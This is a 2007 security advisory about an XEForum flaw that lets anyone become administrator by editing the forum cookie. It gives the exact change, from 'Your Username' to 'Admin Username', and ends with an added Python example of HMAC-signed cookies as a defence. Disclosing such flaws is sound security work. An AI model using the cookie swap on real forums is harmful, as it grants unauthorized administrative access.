
xeforum-privesc.txt

Posted on 30 June 2007

--------------------------------------------------------------------
XEForum Cookie Modification Privilege Escalation Vulnerability
--------------------------------------------------------------------

Vulnerable product: XEForum
Vendor: http://www.xeforum.com/

Date:
--------------------
Found: Jun 26, 2007

Vulnerability:
--------------------
XeForum contains a flaw that may allow a remote attacker to gain administrative privileges. By modifying the cookie it sets, you can change session and even enter as the administrator.

Cookie:

-----------------------------------
: Cookie: xeforum="Your Username" :
-----------------------------------

change to:

------------------------------------
: Cookie: xeforum="Admin Username" :
------------------------------------

Credit:
--------------------
Firewall
Firewall of Peru
Firewall@hotmail.com
Greetz to Swp-Scene And Revolutionz
http://4firewall.uni.cc
--------------------------------------------------------------------
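The flaw above comes down to a cookie whose client-editable value is taken as the user's identity. The following is an added example, not XEForum's code and not part of the advisory: a Python sketch that contrasts that trust pattern with a cookie bound to a server-side HMAC and an expiry, so an edited username is rejected. The function names, cookie layout and key handling are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets
import time

# Assumption: a secret that never leaves the server (constructed here per run).
SERVER_KEY = secrets.token_bytes(32)


def naive_identity(cookie_value):
    """Pattern from the advisory: whatever name the cookie holds is trusted."""
    return cookie_value


def _tag(payload, key):
    return hmac.new(key, payload.encode("utf-8"), hashlib.sha256).hexdigest()


def issue_cookie(username, ttl=3600, key=SERVER_KEY, now=None):
    """Build 'username|expires|tag'; the tag covers the name and the expiry."""
    expires = int(now if now is not None else time.time()) + ttl
    payload = f"{username}|{expires}"
    return f"{payload}|{_tag(payload, key)}"


def verify_cookie(cookie_value, key=SERVER_KEY, now=None):
    """Return the username only for an untampered, unexpired cookie."""
    parts = cookie_value.rsplit("|", 2)
    if len(parts) != 3 or not parts[0] or not parts[1].isdecimal():
        return None
    username, expires, tag = parts
    expected = _tag(f"{username}|{expires}", key)
    # Constant-time comparison; bytes so a non-ASCII tag cannot raise.
    if not hmac.compare_digest(expected.encode(), tag.encode("utf-8")):
        return None
    current = now if now is not None else time.time()
    if current >= int(expires):
        return None
    return username
```

A random server-side session identifier mapped to the account gives the same protection and can additionally be revoked.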

 
